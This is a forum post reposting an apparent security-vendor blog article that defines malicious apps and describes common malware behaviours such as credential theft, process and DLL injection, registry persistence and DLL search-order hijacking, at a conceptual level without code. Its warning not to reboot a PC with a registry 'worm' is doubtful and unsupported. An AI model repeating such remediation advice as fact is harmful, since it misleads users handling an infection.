Thread Rating:
  • 1 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
What is a Malicious App and How to Spot One?
#1
Lightbulb 
Quote:
[Image: heimdal-logo.svg]

Malicious App Definition. Blacklisting and Whitelisting Apps. Protecting Your Assets against Malicious Apps

We’re all familiar with terms such as “threat-hunting”, “boots on the ground Intelligence” or “DNS traffic filtering.” Going back to one’s roots is always a good idea and today I’ll do just that. This article is dedicated to malicious applications. Indeed, we are going to talk about the malicious app definition, what makes an app malicious, typical behavioral patterns, and how to protect your digital assets against malicious applications. As always, stay safe and enjoy your Friday afternoon read.

Defining Malicious Applications

So, what is a malicious application? According to the paper “The World of Malware: An Overview” a malware is defined as:
 
Quote:“a program code that is hostile and often used to corrupt or misuse a system. Introducing malware into a computer network environment has different effects depending on the design intent of the malware and the network layout. Malware detection and prevention systems are bypassed by malicious files in computer systems as malware becomes more complex and large in numbers”.

Mind you that this definition is not all-encompassing, mostly because it does not factor in pseudo malicious endeavors such as hacktivism. Anyway, from this definition we can infer the following aspects related to malicious apps:
  • A malicious app is a software or piece of code designed for nefarious purposes. As practice shows us, these purposes can range from recon (i.e., gathering intel on a designated target to track movement and identify vulnerabilities) to intentionally damage tangible or intangible assets (i.e., pre-attack actions undertaken to weaken cyber-defenses).
  • A malicious application has evasion capabilities. As you know, most of the apps we have installed on our endpoints are digitally-signed and are, as we say, out there in the open. Malicious apps use various TTPs (Tactics, Techniques, and Procedures) to evade digital signature enforcement or even to masquerade as legitimate applications. Obfuscation, as it is called in cybersecurity, is an important property of malware. Without it, even the most basic antivirus or firewall, or antimalware solution can detect the malicious app.
  • Malicious apps are protean in nature. In the malware world, continuous evolution equals survival. If malware developers (hackers) cannot keep up with all the developments in cybersecurity, their creations become utterly useless.
So, by design, malicious apps are ‘slingshotted’ into the open with the intent of harming, eavesdropping or soften up defenses. Now, the question at hand here is how do we identify malicious applications? Studying their behavior might give us some clues. Let’s take a look at some of them.

Typical Malicious Behavior

Here are some of the most common behavioral patterns of malicious applications.

Grabbing credentials

Any application that is designed to extract credentials through packet sniffing, keylogging, ‘dumpster diving’ or other methods can be considered malicious. Of course, the best defense would be to deploy and use an efficient antimalware solution.

Process injection

Any type of activity that supersedes normal system processes by introducing malicious binaries or code pieces should be labeled as malicious. The ‘most’ targeted system processes are regsvr32.exe and svchost.exe.

Dynamic-Link Library injection and\or replacement

Any type of action undertaken to externally manipulate a functioning DLL (i.e., writing a path to a DLL found inside an app’s process and then executing malicious code via a remote-controlled thread) is considered malicious behavior. In some cases, the legit DLLs can be swapped with fake (and malicious) processes. This is called DLL replacement.

Hook injection

In some instances, attackers might use the hook injection technique in order to gain access to core memory functions. This technique involves loading and running a piece of malicious code inside the environment of a running program.

Registry persistence

It’s not uncommon for a previously removed program to linger in the Windows registry. Of course, these ‘breadcrumbs’ can be successfully cleared with tools such as CCleaner, AVG PC Tune-up Utilities, or CleanMyPC. However, when those bits won’t go away and they start modifying registry keys or values, you might have a malicious app on its hand. Word of caution: do not reboot or shut down your PC if you have a registry ‘worm’. Doing so will only grant the malicious app more rights.

‘Trojanazing’ commonly used system binaries

Although an uncommon malicious technique, it’s deadly efficient and quite hard to detect and root out. The purpose of this action is to compromise commonly used system binaries, effectively turning them into bit-sized trojans. This is achieved through fake patching. Once the fake binaries are loaded and run, they will grant hackers access to key memory areas.

Hijacking the DLL load order

Every time your computer boots, the OS will start looking for DLLs. Why? Because executables love DLLs and DLLs relish on executables. This is done, of course, in a certain order. Here’s the catch: if the path to a specific DLL is not hard coded (i.e., set in stone), a malicious piece of code can be introduced in this search order, which would result in the executable loading it.
...
Continue Reading
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)
[-]
Welcome
You have to register before you can post on our site.

Username/Email:


Password:





[-]
Recent Posts
AWZ Screen Recorder
AWZ Screen Recorder ...zevish — 11:05
Website X5 Go 2024.1
Website X5 Go 2024.1...zevish — 09:32
Apple's rules to allow third-party app ...
Apple has announ...alison30 — 09:28
Intel: Microsoft AI PCs need a Copilot K...
Microsoft hopes th...harlan4096 — 08:55
Synchredible 8 Professional Edition v8.2...
          Synchredib...zevish — 08:54

[-]
Birthdays
Today's Birthdays
No birthdays today.
Upcoming Birthdays
No upcoming birthdays.

[-]
Online Staff
There are no staff members currently online.

>